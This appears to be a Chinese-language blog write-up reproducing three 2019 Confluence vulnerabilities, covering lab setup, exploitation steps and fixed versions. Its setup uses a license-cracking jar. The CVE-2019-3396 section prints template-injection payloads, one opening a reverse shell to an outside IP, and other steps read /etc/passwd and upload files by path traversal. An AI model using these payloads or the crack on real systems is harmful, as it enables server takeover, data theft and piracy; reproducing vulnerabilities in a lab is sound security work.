漏洞信息

漏洞ID: 1720881漏洞类型: 信任管理漏洞
发布时间: 2019-08-29更新时间: 2019-09-05
CVE编号: CVE-2019-3394CNNVD-ID: CNNVD-201908-2216
漏洞平台: N/ACVSS评分: N/A
漏洞ID: 1550881漏洞类型: 路径遍历漏洞
发布时间: 2019-03-25更新时间: 2019-03-26
CVE编号: CVE-2019-3396CNNVD-ID: CNNVD-201903-909
漏洞平台: N/ACVSS评分: N/A
漏洞ID: 1575270漏洞类型: 路径遍历漏洞
发布时间: 2019-04-25更新时间: 2019-04-26
CVE编号: CVE-2019-3398CNNVD-ID: CNNVD-201904-928
漏洞平台: N/ACVSS评分: N/A

漏洞详情

Confluence是款企业知识库软件,其中Confluence Server和Data Center产品中使用的小工具连接器widgetconnecter组件 (版本<=3.1.3) 中存在任意文件读取,命令执行等.

攻击成本:低
危害程度:中
是否登陆:需要
影响范围:2.0.0 <= version < 6.6.13, 6.7.0 <= version < 6.12.4, 6.13.0 <= version < 6.13.4, 6.14.0 <= version < 6.14.3, 6.15.0 <= version < 6.15.2

漏洞重现

叮咚:这里所使用的的Confluence版本为6.3.4,而MysSQL版本为5.7

首先使用docker搭建mysql

#拉取镜像
docker pull mysql:5.7
#启用容器,并设置mysql的root密码为123456
docker run --name mysql5.7 -p 3306:3306 -e MYSQL_ROOT_PASSWORD=123456 -d mysql:5.7
#创建confluence数据库
create database confluence character set utf8;

接下来,开始安装confluence6.3.4,但是要注意安装完成后先不要启动confluence

# 下载安装文件
wget https://www.atlassian.com/software/confluence/downloads/binary/atlassian-confluence-6.3.4-x64.bin
# 赋予安装文件执行权限
chmod +x atlassian-confluence-6.3.4-x64.bin
#执行安装文件,中间安装选项为 o 1 i n
./atlassian-confluence-6.3.4-x64.bin

安装过程

下载系统破解程序及链接mysql的jar包,下载链接如下:
atlassian-extras-decoder-v2-3.2.jar
atlassian-universal-plugin-manager-plugin-2.22.1.jar
mysql-connector-java-5.0.8-bin.jar

在路径/opt/atlassian/confluence/confluence/WEB-INF/lib下更换atlassian-extras-decoder-v2-3.2.jar文件(将原文件做一下备份)
在路径/opt/atlassian/confluence/confluence/WEB-INF/atlassian-bundled-plugins下更换atlassian-universal-plugin-manager-plugin-2.22.1.jar文件(将原文件做一下备份)
把数据库链接文件mysql-connector-java-5.0.8-bin.jar放在/opt/atlassian/confluence/lib路径下

执行命令sudo service confluence start启动confluence,最后访问http://149.28.24.201:8090/操作图形安装,插件不需要安装,令牌可以获取临时的.

漏洞利用

CVE-2019-3394

在文本编辑处插入图片,使用来自于网络,且链接以/packages开头的图片,后面跟你想要读取的文件路径,如下图:

插入假的图片

插入后,点击发布更新,拦截数据包修改上传连接,将src部分的地址部分去掉

抓取的数据包

最后点击,导出Word触发漏洞即可.成功读取数据后会保存到图片中,然后放到Word文档里面,由于无法正常显示,所以使用burp来查看返回的数据

成功读取数据的图片

返回的数据

CVE-2019-3396

点击创建选择其他宏,小工具连接器组件,输入上传地址(随意输入,您开心就好),然后点击预览抓包.

选择宏界面

创建小工具连接器组件

抓取数据包,可以发现这个位置没有_template参数,可能这里是通过白盒代码审计发现的漏洞,把_template参数添加上进行执行任意文件读取,如下图读取的是/etc/passwd

抓取的数据包

命令执行语法
执行计算机:
#set($e="e") $e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("/usr/bin/gnome-calculator")
nc反弹shell:
#set($e="e") $e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("bash -i >& /dev/tcp/149.129.68.79/56888 0>&1")

CVE-2019-3398

在文件上传位置,选择上传脚本.

脚本上传中...

上传过程通过抓包修改filename,来进行上传路径修改,这里上传成功.

返回的数据

在附件全部下载,抓取链接可以看到上图两个文件.

返回的数据

返回的数据

登录服务器查看文件全部放在zip压缩包中,之前使用了../../向上跳了两级目录,可以看到phpinfo.php在上两级目录中.

返回的数据

修复方案

漏洞修复版本为6.6.136.12.46.13.46.14.36.15.2

参考链接

https://www.anquanke.com/post/id/185441
https://www.anquanke.com/post/id/197665
https://blog.csdn.net/caiqiiqi/article/details/89034761
https://nosec.org/home/detail/2461.html
https://www.pythonheidong.com/blog/article/304926/
https://blog.csdn.net/weixin_44058342/article/details/100519971

Last modification:July 17th, 2020 at 02:07 pm